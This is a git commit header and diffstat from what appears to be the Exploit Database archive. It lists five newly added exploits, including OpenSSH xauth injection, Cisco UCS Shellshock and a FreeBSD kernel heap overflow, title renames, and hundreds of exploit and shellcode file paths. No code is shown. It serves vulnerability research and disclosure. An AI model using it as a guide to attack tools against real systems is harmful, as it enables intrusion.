From 477bcbdcc0f9e6163099d7623678a208e993e7d6 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Thu, 17 Mar 2016 07:07:56 +0000 Subject: [PATCH] DB: 2016-03-17 5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 
16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow --- files.csv | 39 +- platforms/aix/local/1044.c | 6 +- platforms/aix/local/1045.c | 6 +- platforms/aix/local/1046.c | 6 +- platforms/aix/local/333.c | 6 +- platforms/aix/local/335.c | 6 +- platforms/aix/local/4231.c | 356 +- platforms/aix/local/4232.sh | 58 +- platforms/aix/local/4233.c | 314 +- platforms/aix/local/898.sh | 6 +- platforms/aix/local/9306.txt | 66 +- platforms/aix/shellcode/13241.txt | 4 +- platforms/asp/webapps/1010.pl | 6 +- platforms/asp/webapps/1011.php | 6 +- platforms/asp/webapps/1012.txt | 6 +- platforms/asp/webapps/1015.txt | 6 +- platforms/asp/webapps/1070.pl | 6 +- platforms/asp/webapps/1071.pl | 6 +- platforms/asp/webapps/1112.txt | 6 +- platforms/asp/webapps/1252.htm | 88 +- platforms/asp/webapps/1418.txt | 118 +- platforms/asp/webapps/1419.pl | 106 +- platforms/asp/webapps/1472.pl | 186 +- platforms/asp/webapps/1514.pl | 100 +- platforms/asp/webapps/1528.pl | 140 +- platforms/asp/webapps/1529.htm | 72 +- platforms/asp/webapps/1550.txt | 132 +- platforms/asp/webapps/1562.pl | 136 +- platforms/asp/webapps/1569.pl | 110 +- platforms/asp/webapps/1571.htm | 114 +- platforms/asp/webapps/1589.pl | 134 +- platforms/asp/webapps/1597.pl | 174 +- platforms/asp/webapps/1623.pl | 138 +- platforms/asp/webapps/1700.pl | 154 +- platforms/asp/webapps/1714.txt | 36 +- platforms/asp/webapps/1759.txt | 60 +- platforms/asp/webapps/1807.txt | 42 +- platforms/asp/webapps/1833.txt | 22 +- platforms/asp/webapps/1834.asp | 98 +- platforms/asp/webapps/1836.txt | 14 +- platforms/asp/webapps/1837.pl | 408 +- platforms/asp/webapps/1840.txt | 50 +- platforms/asp/webapps/1845.txt | 30 +- platforms/asp/webapps/1849.htm | 138 +- platforms/asp/webapps/1850.htm | 86 +- platforms/asp/webapps/1859.htm | 158 +- platforms/asp/webapps/1873.txt 
| 16 +- platforms/asp/webapps/1884.htm | 24 +- platforms/asp/webapps/1900.txt | 4 +- platforms/asp/webapps/1930.txt | 18 +- platforms/asp/webapps/1931.txt | 102 +- platforms/asp/webapps/1987.txt | 362 +- platforms/asp/webapps/2138.txt | 24 +- platforms/asp/webapps/2186.txt | 44 +- platforms/asp/webapps/2228.txt | 54 +- platforms/asp/webapps/2230.txt | 54 +- platforms/asp/webapps/2294.txt | 32 +- platforms/asp/webapps/2296.txt | 148 +- platforms/asp/webapps/2306.txt | 46 +- platforms/asp/webapps/2362.txt | 26 +- platforms/asp/webapps/2384.txt | 42 +- platforms/asp/webapps/2385.txt | 56 +- platforms/asp/webapps/2386.txt | 46 +- platforms/asp/webapps/2395.txt | 36 +- platforms/asp/webapps/2416.txt | 22 +- platforms/asp/webapps/2421.pl | 92 +- platforms/asp/webapps/2423.txt | 36 +- platforms/asp/webapps/2592.htm | 76 +- platforms/asp/webapps/2642.asp | 378 +- platforms/asp/webapps/2661.asp | 358 +- platforms/asp/webapps/2662.txt | 92 +- platforms/asp/webapps/2683.txt | 42 +- platforms/asp/webapps/2684.txt | 42 +- platforms/asp/webapps/2746.pl | 174 +- platforms/asp/webapps/2754.pl | 170 +- platforms/asp/webapps/2755.pl | 146 +- platforms/asp/webapps/2756.txt | 40 +- platforms/asp/webapps/2757.pl | 138 +- platforms/asp/webapps/2761.pl | 138 +- platforms/asp/webapps/2762.asp | 384 +- platforms/asp/webapps/2763.txt | 38 +- platforms/asp/webapps/2764.txt | 44 +- platforms/asp/webapps/2765.txt | 50 +- platforms/asp/webapps/2772.htm | 72 +- platforms/asp/webapps/2774.txt | 38 +- platforms/asp/webapps/2779.txt | 38 +- platforms/asp/webapps/2780.txt | 40 +- platforms/asp/webapps/2781.txt | 48 +- platforms/asp/webapps/2782.txt | 44 +- platforms/asp/webapps/2813.txt | 114 +- platforms/asp/webapps/2828.pl | 116 +- platforms/asp/webapps/2829.txt | 48 +- platforms/asp/webapps/2830.txt | 44 +- platforms/asp/webapps/2846.txt | 46 +- platforms/asp/webapps/2848.txt | 24 +- platforms/asp/webapps/2849.txt | 64 +- platforms/asp/webapps/2853.txt | 24 +- platforms/asp/webapps/2881.txt | 78 
+- platforms/asp/webapps/2907.txt | 56 +- platforms/asp/webapps/2908.txt | 60 +- platforms/asp/webapps/2909.txt | 44 +- platforms/asp/webapps/2962.txt | 42 +- platforms/asp/webapps/2963.txt | 52 +- platforms/asp/webapps/2986.txt | 52 +- platforms/asp/webapps/2987.txt | 74 +- platforms/asp/webapps/2988.pl | 134 +- platforms/asp/webapps/2989.txt | 60 +- platforms/asp/webapps/2990.pl | 134 +- platforms/asp/webapps/2991.pl | 134 +- platforms/asp/webapps/2992.txt | 50 +- platforms/asp/webapps/2993.txt | 50 +- platforms/asp/webapps/2994.htm | 168 +- platforms/asp/webapps/2996.htm | 162 +- platforms/asp/webapps/2997.pl | 198 +- platforms/asp/webapps/2998.pl | 198 +- platforms/asp/webapps/3001.txt | 52 +- platforms/asp/webapps/3015.pl | 198 +- platforms/asp/webapps/3031.txt | 50 +- platforms/asp/webapps/3032.txt | 70 +- platforms/asp/webapps/3035.txt | 52 +- platforms/asp/webapps/3046.txt | 68 +- platforms/asp/webapps/3060.txt | 32 +- platforms/asp/webapps/3061.txt | 42 +- platforms/asp/webapps/3062.txt | 54 +- platforms/asp/webapps/3066.txt | 30 +- platforms/asp/webapps/3068.htm | 80 +- platforms/asp/webapps/3073.txt | 56 +- platforms/asp/webapps/3074.txt | 54 +- platforms/asp/webapps/3081.pl | 166 +- platforms/asp/webapps/3089.txt | 84 +- platforms/asp/webapps/3105.txt | 428 +- platforms/asp/webapps/3115.txt | 78 +- platforms/asp/webapps/3122.pl | 248 +- platforms/asp/webapps/3135.txt | 38 +- platforms/asp/webapps/3186.txt | 52 +- platforms/asp/webapps/3195.txt | 54 +- platforms/asp/webapps/3210.txt | 80 +- platforms/asp/webapps/3233.txt | 46 +- platforms/asp/webapps/3241.txt | 34 +- platforms/asp/webapps/3295.txt | 74 +- platforms/asp/webapps/3301.txt | 34 +- platforms/asp/webapps/3317.txt | 26 +- platforms/asp/webapps/3318.txt | 60 +- platforms/asp/webapps/3339.txt | 52 +- platforms/asp/webapps/3390.txt | 122 +- platforms/asp/webapps/3437.txt | 38 +- platforms/asp/webapps/3466.txt | 28 +- platforms/asp/webapps/3469.txt | 38 +- platforms/asp/webapps/3470.htm | 144 +- 
platforms/asp/webapps/3481.htm | 130 +- platforms/asp/webapps/3520.txt | 40 +- platforms/asp/webapps/3534.txt | 38 +- platforms/asp/webapps/3536.txt | 38 +- platforms/asp/webapps/3546.txt | 42 +- platforms/asp/webapps/3550.txt | 36 +- platforms/asp/webapps/3551.txt | 36 +- platforms/asp/webapps/3556.htm | 132 +- platforms/asp/webapps/3767.txt | 40 +- platforms/asp/webapps/3831.txt | 44 +- platforms/asp/webapps/3905.txt | 26 +- platforms/asp/webapps/3914.txt | 28 +- platforms/asp/webapps/3936.txt | 34 +- platforms/asp/webapps/4007.txt | 36 +- platforms/asp/webapps/4040.txt | 32 +- platforms/asp/webapps/4057.txt | 30 +- platforms/asp/webapps/4083.txt | 42 +- platforms/asp/webapps/4198.txt | 34 +- platforms/asp/webapps/4239.txt | 130 +- platforms/asp/webapps/4458.txt | 92 +- platforms/asp/webapps/4486.txt | 38 +- platforms/asp/webapps/4578.txt | 52 +- platforms/asp/webapps/4609.txt | 30 +- platforms/asp/webapps/4644.txt | 64 +- platforms/asp/webapps/4687.htm | 62 +- platforms/asp/webapps/4697.txt | 82 +- platforms/asp/webapps/4730.txt | 728 +- platforms/asp/webapps/4848.txt | 232 +- platforms/asp/webapps/4900.txt | 204 +- platforms/asp/webapps/4910.pl | 272 +- platforms/asp/webapps/4921.txt | 12 +- platforms/asp/webapps/4970.txt | 108 +- platforms/asp/webapps/4971.txt | 112 +- platforms/asp/webapps/4972.txt | 108 +- platforms/asp/webapps/4988.txt | 224 +- platforms/asp/webapps/5185.txt | 124 +- platforms/asp/webapps/5187.txt | 82 +- platforms/asp/webapps/5274.txt | 284 +- platforms/asp/webapps/5276.txt | 96 +- platforms/asp/webapps/5373.txt | 110 +- platforms/asp/webapps/5409.txt | 152 +- platforms/asp/webapps/5456.txt | 226 +- platforms/asp/webapps/5475.txt | 176 +- platforms/asp/webapps/5482.py | 308 +- platforms/asp/webapps/5503.txt | 134 +- platforms/asp/webapps/5507.txt | 186 +- platforms/asp/webapps/5553.txt | 76 +- platforms/asp/webapps/5556.txt | 89 +- platforms/asp/webapps/5564.txt | 146 +- platforms/asp/webapps/5608.txt | 116 +- platforms/asp/webapps/5633.pl 
| 286 +- platforms/asp/webapps/5705.txt | 128 +- platforms/asp/webapps/5717.txt | 50 +- platforms/asp/webapps/5753.txt | 50 +- platforms/asp/webapps/5763.txt | 76 +- platforms/asp/webapps/5765.txt | 80 +- platforms/asp/webapps/5780.txt | 60 +- platforms/asp/webapps/5781.txt | 76 +- platforms/asp/webapps/5805.txt | 66 +- platforms/asp/webapps/5849.txt | 138 +- platforms/asp/webapps/5894.txt | 58 +- platforms/asp/webapps/5912.txt | 54 +- platforms/asp/webapps/5927.txt | 60 +- platforms/asp/webapps/6104.pl | 196 +- platforms/asp/webapps/6105.pl | 208 +- platforms/asp/webapps/6119.txt | 38 +- platforms/asp/webapps/6135.txt | 40 +- platforms/asp/webapps/6405.txt | 46 +- platforms/asp/webapps/6420.txt | 106 +- platforms/asp/webapps/6453.txt | 84 +- platforms/asp/webapps/6470.txt | 116 +- platforms/asp/webapps/6610.txt | 106 +- platforms/asp/webapps/6720.txt | 46 +- platforms/asp/webapps/6725.txt | 44 +- platforms/asp/webapps/6731.txt | 58 +- platforms/asp/webapps/6810.txt | 104 +- platforms/asp/webapps/7067.txt | 34 +- platforms/asp/webapps/7120.txt | 70 +- platforms/asp/webapps/7141.txt | 208 +- platforms/asp/webapps/7259.txt | 94 +- platforms/asp/webapps/7274.txt | 84 +- platforms/asp/webapps/7275.txt | 86 +- platforms/asp/webapps/7276.txt | 84 +- platforms/asp/webapps/7277.txt | 84 +- platforms/asp/webapps/7280.txt | 90 +- platforms/asp/webapps/7282.txt | 90 +- platforms/asp/webapps/7283.txt | 84 +- platforms/asp/webapps/7287.txt | 86 +- platforms/asp/webapps/7292.txt | 62 +- platforms/asp/webapps/7295.txt | 136 +- platforms/asp/webapps/7316.txt | 64 +- platforms/asp/webapps/7325.txt | 108 +- platforms/asp/webapps/7326.txt | 104 +- platforms/asp/webapps/7340.txt | 48 +- platforms/asp/webapps/7348.txt | 56 +- platforms/asp/webapps/7349.txt | 64 +- platforms/asp/webapps/7350.txt | 84 +- platforms/asp/webapps/7353.txt | 40 +- platforms/asp/webapps/7356.txt | 74 +- platforms/asp/webapps/7357.txt | 60 +- platforms/asp/webapps/7359.txt | 46 +- platforms/asp/webapps/7360.txt 
| 48 +- platforms/asp/webapps/7361.txt | 50 +- platforms/asp/webapps/7370.txt | 72 +- platforms/asp/webapps/7371.txt | 38 +- platforms/asp/webapps/7372.txt | 38 +- platforms/asp/webapps/7373.txt | 104 +- platforms/asp/webapps/7376.txt | 38 +- platforms/asp/webapps/7378.txt | 70 +- platforms/asp/webapps/7390.txt | 60 +- platforms/asp/webapps/7391.txt | 60 +- platforms/asp/webapps/7398.txt | 72 +- platforms/asp/webapps/7412.txt | 60 +- platforms/asp/webapps/7413.pl | 88 +- platforms/asp/webapps/7414.txt | 58 +- platforms/asp/webapps/7415.txt | 54 +- platforms/asp/webapps/7416.txt | 54 +- platforms/asp/webapps/7419.txt | 116 +- platforms/asp/webapps/7420.txt | 50 +- platforms/asp/webapps/7423.txt | 84 +- platforms/asp/webapps/7424.txt | 84 +- platforms/asp/webapps/7425.txt | 84 +- platforms/asp/webapps/7427.txt | 54 +- platforms/asp/webapps/7428.txt | 54 +- platforms/asp/webapps/7429.txt | 52 +- platforms/asp/webapps/7436.txt | 38 +- platforms/asp/webapps/7438.txt | 56 +- platforms/asp/webapps/7440.txt | 116 +- platforms/asp/webapps/7446.txt | 32 +- platforms/asp/webapps/7447.txt | 36 +- platforms/asp/webapps/7450.txt | 38 +- platforms/asp/webapps/7462.txt | 62 +- platforms/asp/webapps/7466.txt | 26 +- platforms/asp/webapps/7468.txt | 28 +- platforms/asp/webapps/7469.txt | 28 +- platforms/asp/webapps/7470.txt | 28 +- platforms/asp/webapps/7471.txt | 28 +- platforms/asp/webapps/7472.txt | 28 +- platforms/asp/webapps/7484.txt | 88 +- platforms/asp/webapps/7485.txt | 90 +- platforms/asp/webapps/7486.txt | 92 +- platforms/asp/webapps/7488.txt | 26 +- platforms/asp/webapps/7491.txt | 34 +- platforms/asp/webapps/7495.txt | 64 +- platforms/asp/webapps/7499.txt | 50 +- platforms/asp/webapps/7508.txt | 54 +- platforms/asp/webapps/7534.txt | 40 +- platforms/asp/webapps/7599.txt | 52 +- platforms/asp/webapps/7609.txt | 44 +- platforms/asp/webapps/7610.txt | 46 +- platforms/asp/webapps/7613.txt | 66 +- platforms/asp/webapps/7627.txt | 56 +- platforms/asp/webapps/7665.txt | 134 +- 
platforms/asp/webapps/7666.txt | 52 +- platforms/asp/webapps/7744.txt | 74 +- platforms/asp/webapps/7752.txt | 52 +- platforms/asp/webapps/7754.txt | 60 +- platforms/asp/webapps/7761.txt | 74 +- platforms/asp/webapps/7766.txt | 62 +- platforms/asp/webapps/7767.txt | 84 +- platforms/asp/webapps/7768.txt | 60 +- platforms/asp/webapps/7769.txt | 60 +- platforms/asp/webapps/7770.txt | 60 +- platforms/asp/webapps/7771.txt | 60 +- platforms/asp/webapps/7772.txt | 58 +- platforms/asp/webapps/7773.txt | 90 +- platforms/asp/webapps/7774.txt | 90 +- platforms/asp/webapps/7782.txt | 60 +- platforms/asp/webapps/7783.txt | 60 +- platforms/asp/webapps/7784.txt | 58 +- platforms/asp/webapps/7788.txt | 40 +- platforms/asp/webapps/7789.txt | 48 +- platforms/asp/webapps/7791.txt | 54 +- platforms/asp/webapps/7800.txt | 60 +- platforms/asp/webapps/7801.txt | 60 +- platforms/asp/webapps/7802.txt | 64 +- platforms/asp/webapps/7803.txt | 70 +- platforms/asp/webapps/7816.txt | 76 +- platforms/asp/webapps/7850.txt | 46 +- platforms/asp/webapps/7861.txt | 66 +- platforms/asp/webapps/7872.txt | 125 +- platforms/asp/webapps/7924.txt | 132 +- platforms/asp/webapps/7963.txt | 76 +- platforms/asp/webapps/7981.txt | 60 +- platforms/asp/webapps/7982.txt | 58 +- platforms/asp/webapps/7991.txt | 34 +- platforms/asp/webapps/8048.txt | 82 +- platforms/asp/webapps/8065.txt | 40 +- platforms/asp/webapps/8070.txt | 88 +- platforms/asp/webapps/8107.txt | 92 +- platforms/asp/webapps/8109.txt | 96 +- platforms/asp/webapps/8110.txt | 96 +- platforms/asp/webapps/8111.txt | 100 +- platforms/asp/webapps/8113.txt | 94 +- platforms/asp/webapps/8130.txt | 108 +- platforms/asp/webapps/8131.txt | 94 +- platforms/asp/webapps/8132.txt | 92 +- platforms/asp/webapps/8307.txt | 84 +- platforms/asp/webapps/8379.txt | 58 +- platforms/asp/webapps/8397.txt | 134 +- platforms/asp/webapps/8528.txt | 62 +- platforms/asp/webapps/8529.txt | 66 +- platforms/asp/webapps/8530.htm | 104 +- platforms/asp/webapps/8596.pl | 140 +- 
platforms/asp/webapps/8627.txt | 50 +- platforms/asp/webapps/8705.txt | 54 +- platforms/asp/webapps/8726.txt | 40 +- platforms/asp/webapps/8734.txt | 44 +- platforms/asp/webapps/8749.txt | 48 +- platforms/asp/webapps/8756.txt | 70 +- platforms/asp/webapps/8785.txt | 54 +- platforms/asp/webapps/8849.txt | 66 +- platforms/asp/webapps/8859.txt | 58 +- platforms/asp/webapps/8889.txt | 102 +- platforms/asp/webapps/8890.txt | 86 +- platforms/asp/webapps/925.txt | 6 +- platforms/asp/webapps/9328.txt | 14 +- platforms/asp/webapps/9562.txt | 328 +- platforms/asp/webapps/9612.txt | 86 +- platforms/asp/webapps/9675.txt | 122 +- platforms/asp/webapps/9856.txt | 2 +- platforms/bsd/dos/1540.pl | 62 +- platforms/bsd/dos/2524.c | 28 +- platforms/bsd/dos/2541.c | 54 +- platforms/bsd/dos/2542.c | 32 +- platforms/bsd/dos/2639.c | 78 +- platforms/bsd/dos/343.c | 6 +- platforms/bsd/dos/4935.c | 128 +- platforms/bsd/dos/8581.txt | 284 +- platforms/bsd/dos/869.c | 6 +- platforms/bsd/local/118.c | 6 +- platforms/bsd/local/125.c | 6 +- platforms/bsd/local/200.c | 6 +- platforms/bsd/local/202.c | 6 +- platforms/bsd/local/207.c | 6 +- platforms/bsd/local/243.c | 6 +- platforms/bsd/local/3094.c | 266 +- platforms/bsd/local/396.c | 6 +- platforms/bsd/local/579.sh | 6 +- platforms/bsd/local/739.c | 6 +- platforms/bsd/remote/1234.c | 966 +- platforms/bsd/remote/228.c | 6 +- platforms/bsd/remote/234.c | 6 +- platforms/bsd/remote/409.c | 6 +- platforms/bsd/remote/432.c | 6 +- platforms/bsd/shellcode/13242.txt | 4 +- platforms/bsd_ppc/shellcode/13243.c | 4 +- platforms/bsd_x86/shellcode/13244.c | 88 +- platforms/bsd_x86/shellcode/13245.c | 222 +- platforms/bsd_x86/shellcode/13246.c | 4 +- platforms/bsd_x86/shellcode/13247.c | 4 +- platforms/bsd_x86/shellcode/13248.c | 4 +- platforms/bsd_x86/shellcode/13250.c | 4 +- platforms/bsd_x86/shellcode/13251.c | 4 +- platforms/bsd_x86/shellcode/13252.c | 4 +- platforms/bsd_x86/shellcode/13254.c | 4 +- platforms/bsd_x86/shellcode/13255.c | 4 +- 
platforms/bsd_x86/shellcode/13256.c | 4 +- platforms/bsdi_x86/shellcode/13257.txt | 4 +- platforms/bsdi_x86/shellcode/13258.txt | 4 +- platforms/bsdi_x86/shellcode/13260.c | 4 +- platforms/cgi/webapps/1039.pl | 6 +- platforms/cgi/webapps/1040.c | 6 +- platforms/cgi/webapps/1041.pl | 6 +- platforms/cgi/webapps/1048.pl | 6 +- platforms/cgi/webapps/1120.pl | 6 +- platforms/cgi/webapps/1194.c | 6 +- platforms/cgi/webapps/1236.pm | 378 +- platforms/cgi/webapps/1471.pl | 78 +- platforms/cgi/webapps/1508.pl | 172 +- platforms/cgi/webapps/1669.pl | 88 +- platforms/cgi/webapps/1670.pl | 96 +- platforms/cgi/webapps/1677.php | 292 +- platforms/cgi/webapps/1755.py | 262 +- platforms/cgi/webapps/179.c | 6 +- platforms/cgi/webapps/1862.c | 346 +- platforms/cgi/webapps/188.pl | 6 +- platforms/cgi/webapps/211.c | 6 +- platforms/cgi/webapps/2266.txt | 140 +- platforms/cgi/webapps/2267.txt | 228 +- platforms/cgi/webapps/242.pl | 6 +- platforms/cgi/webapps/289.pl | 6 +- platforms/cgi/webapps/3065.txt | 34 +- platforms/cgi/webapps/3412.txt | 128 +- platforms/cgi/webapps/4261.txt | 24 +- platforms/cgi/webapps/4264.txt | 74 +- platforms/cgi/webapps/4343.txt | 30 +- platforms/cgi/webapps/4529.txt | 72 +- platforms/cgi/webapps/464.txt | 6 +- platforms/cgi/webapps/4647.txt | 22 +- platforms/cgi/webapps/4977.txt | 96 +- platforms/cgi/webapps/53.c | 6 +- platforms/cgi/webapps/5304.txt | 18 +- platforms/cgi/webapps/5662.txt | 180 +- platforms/cgi/webapps/6108.pl | 192 +- platforms/cgi/webapps/6109.pl | 192 +- platforms/cgi/webapps/6110.pl | 192 +- platforms/cgi/webapps/6111.pl | 192 +- platforms/cgi/webapps/6269.txt | 122 +- platforms/cgi/webapps/642.pl | 6 +- platforms/cgi/webapps/6509.txt | 66 +- platforms/cgi/webapps/659.txt | 6 +- platforms/cgi/webapps/6771.txt | 86 +- platforms/cgi/webapps/6845.txt | 26 +- platforms/cgi/webapps/6864.txt | 46 +- platforms/cgi/webapps/7404.txt | 54 +- platforms/cgi/webapps/7753.pl | 106 +- platforms/cgi/webapps/8085.txt | 36 +- 
platforms/cgi/webapps/8086.txt | 38 +- platforms/cgi/webapps/8087.txt | 32 +- platforms/cgi/webapps/8247.txt | 328 +- platforms/cgi/webapps/862.txt | 6 +- platforms/cgi/webapps/8895.txt | 116 +- platforms/cgi/webapps/8987.txt | 70 +- platforms/cgi/webapps/9074.txt | 116 +- platforms/cgi/webapps/9140.txt | 14 +- platforms/cgi/webapps/9357.txt | 68 +- platforms/cgi/webapps/954.pl | 6 +- platforms/cgi/webapps/980.pl | 6 +- platforms/freebsd/dos/8259.c | 20 +- platforms/freebsd/dos/9134.c | 116 +- platforms/freebsd/dos/9206.c | 82 +- platforms/freebsd/dos/9373.c | 150 +- platforms/freebsd/local/7581.c | 288 +- platforms/freebsd/local/8261.c | 260 +- platforms/freebsd_x86-64/dos/39570.c | 227 + platforms/freebsd_x86-64/shellcode/13279.c | 110 +- platforms/freebsd_x86-64/shellcode/13280.c | 124 +- platforms/freebsd_x86/shellcode/13261.txt | 84 +- platforms/freebsd_x86/shellcode/13262.txt | 140 +- platforms/freebsd_x86/shellcode/13263.txt | 264 +- platforms/freebsd_x86/shellcode/13264.txt | 88 +- platforms/freebsd_x86/shellcode/13265.c | 202 +- platforms/freebsd_x86/shellcode/13266.asm | 138 +- platforms/freebsd_x86/shellcode/13269.c | 84 +- platforms/freebsd_x86/shellcode/13270.c | 366 +- platforms/freebsd_x86/shellcode/13271.c | 56 +- platforms/freebsd_x86/shellcode/13272.c | 76 +- platforms/freebsd_x86/shellcode/13274.c | 4 +- platforms/freebsd_x86/shellcode/13275.c | 4 +- platforms/freebsd_x86/shellcode/13276.c | 4 +- platforms/freebsd_x86/shellcode/13277.c | 4 +- platforms/generator/shellcode/13281.c | 386 +- platforms/generator/shellcode/13282.php | 128 +- platforms/generator/shellcode/13283.php | 128 +- platforms/generator/shellcode/13284.txt | 204 +- platforms/generator/shellcode/13285.c | 144 +- platforms/generator/shellcode/13286.c | 2722 ++-- platforms/generator/shellcode/13288.c | 362 +- platforms/hardware/dos/1153.pl | 6 +- platforms/hardware/dos/1338.pl | 214 +- platforms/hardware/dos/1411.pl | 48 +- platforms/hardware/dos/1447.c | 218 +- 
platforms/hardware/dos/1464.c | 206 +- platforms/hardware/dos/1473.c | 202 +- platforms/hardware/dos/1496.c | 374 +- platforms/hardware/dos/1551.txt | 28 +- platforms/hardware/dos/1718.pl | 138 +- platforms/hardware/dos/2000.pl | 92 +- platforms/hardware/dos/2059.cpp | 174 +- platforms/hardware/dos/2156.c | 450 +- platforms/hardware/dos/2176.html | 74 +- platforms/hardware/dos/262.pl | 6 +- platforms/hardware/dos/2700.rb | 330 +- platforms/hardware/dos/2915.c | 1496 +- platforms/hardware/dos/2961.py | 120 +- platforms/hardware/dos/3526.pl | 132 +- platforms/hardware/dos/3535.pl | 170 +- platforms/hardware/dos/358.txt | 6 +- platforms/hardware/dos/363.txt | 6 +- platforms/hardware/dos/3791.pl | 94 +- platforms/hardware/dos/3792.pl | 178 +- platforms/hardware/dos/4297.pl | 72 +- platforms/hardware/dos/4298.pl | 190 +- platforms/hardware/dos/4319.pl | 46 +- platforms/hardware/dos/4426.pl | 312 +- platforms/hardware/dos/4692.pl | 178 +- platforms/hardware/dos/4978.html | 68 +- platforms/hardware/dos/5054.c | 400 +- platforms/hardware/dos/59.c | 6 +- platforms/hardware/dos/60.c | 6 +- platforms/hardware/dos/6196.pl | 74 +- platforms/hardware/dos/62.sh | 6 +- platforms/hardware/dos/6394.pl | 182 +- platforms/hardware/dos/6582.pl | 88 +- platforms/hardware/dos/6726.txt | 206 +- platforms/hardware/dos/7220.txt | 32 +- platforms/hardware/dos/7535.php | 128 +- platforms/hardware/dos/7632.txt | 456 +- platforms/hardware/dos/7776.c | 376 +- platforms/hardware/dos/8008.txt | 146 +- platforms/hardware/dos/8051.html | 82 +- platforms/hardware/dos/8125.rb | 244 +- platforms/hardware/dos/8187.sh | 136 +- platforms/hardware/dos/8260.txt | 170 +- platforms/hardware/dos/8313.txt | 66 +- platforms/hardware/dos/8393.txt | 56 +- platforms/hardware/dos/8490.sh | 96 +- platforms/hardware/dos/856.c | 130 +- platforms/hardware/dos/8584.py | 148 +- platforms/hardware/dos/8964.txt | 88 +- platforms/hardware/dos/9067.py | 40 +- platforms/hardware/dos/9514.py | 366 +- 
platforms/hardware/dos/9646.php | 44 +- platforms/hardware/dos/9666.php | 38 +- platforms/hardware/local/8833.txt | 62 +- platforms/hardware/local/9688.txt | 62 +- platforms/hardware/remote/1333.pm | 512 +- platforms/hardware/remote/169.pl | 6 +- platforms/hardware/remote/1889.txt | 68 +- platforms/hardware/remote/2048.pl | 388 +- platforms/hardware/remote/2136.txt | 114 +- platforms/hardware/remote/2145.txt | 114 +- platforms/hardware/remote/254.c | 6 +- platforms/hardware/remote/2638.c | 466 +- platforms/hardware/remote/294.pl | 6 +- platforms/hardware/remote/3189.sh | 284 +- platforms/hardware/remote/3294.txt | 132 +- platforms/hardware/remote/39568.py | 65 + platforms/hardware/remote/425.c | 6 +- platforms/hardware/remote/4744.txt | 44 +- platforms/hardware/remote/4797.pl | 202 +- platforms/hardware/remote/4941.txt | 134 +- platforms/hardware/remote/5113.txt | 82 +- platforms/hardware/remote/5150.txt | 96 +- platforms/hardware/remote/5289.txt | 66 +- platforms/hardware/remote/5926.txt | 702 +- platforms/hardware/remote/6305.htm | 380 +- platforms/hardware/remote/6366.c | 494 +- platforms/hardware/remote/6476.html | 48 +- platforms/hardware/remote/6477.html | 52 +- platforms/hardware/remote/6532.py | 424 +- platforms/hardware/remote/6750.txt | 1016 +- platforms/hardware/remote/6899.txt | 244 +- platforms/hardware/remote/7055.txt | 34 +- platforms/hardware/remote/77.c | 6 +- platforms/hardware/remote/7712.txt | 88 +- platforms/hardware/remote/7845.txt | 174 +- platforms/hardware/remote/7915.txt | 54 +- platforms/hardware/remote/8022.txt | 32 +- platforms/hardware/remote/8023.txt | 68 +- platforms/hardware/remote/8096.txt | 126 +- platforms/hardware/remote/829.c | 6 +- platforms/hardware/remote/8316.txt | 82 +- platforms/hardware/remote/8359.py | 62 +- platforms/hardware/remote/8696.txt | 64 +- platforms/hardware/remote/8846.txt | 44 +- platforms/hardware/remote/8963.txt | 206 +- platforms/hardware/remote/9066.txt | 72 +- platforms/hardware/remote/9117.txt | 232 
+- platforms/hardware/remote/9209.txt | 206 +- platforms/hardware/remote/9432.txt | 44 +- platforms/hardware/remote/9456.txt | 62 +- platforms/hardware/remote/9473.txt | 78 +- platforms/hardware/remote/9498.txt | 52 +- platforms/hardware/remote/9658.txt | 56 +- platforms/hardware/shellcode/13290.txt | 164 +- platforms/hardware/webapps/10276.txt | 104 +- platforms/hardware/webapps/10347.txt | 1 - platforms/hp-ux/dos/195.sh | 6 +- platforms/hp-ux/dos/212.c | 6 +- platforms/hp-ux/local/134.c | 6 +- platforms/hp-ux/local/199.c | 6 +- platforms/hp-ux/local/245.c | 6 +- platforms/hp-ux/local/2633.c | 112 +- platforms/hp-ux/local/2634.c | 114 +- platforms/hp-ux/local/2635.c | 130 +- platforms/hp-ux/local/2636.c | 136 +- platforms/hp-ux/local/482.c | 6 +- platforms/hp-ux/remote/1259.pm | 234 +- platforms/hp-ux/remote/1261.pm | 216 +- platforms/hp-ux/remote/977.c | 6 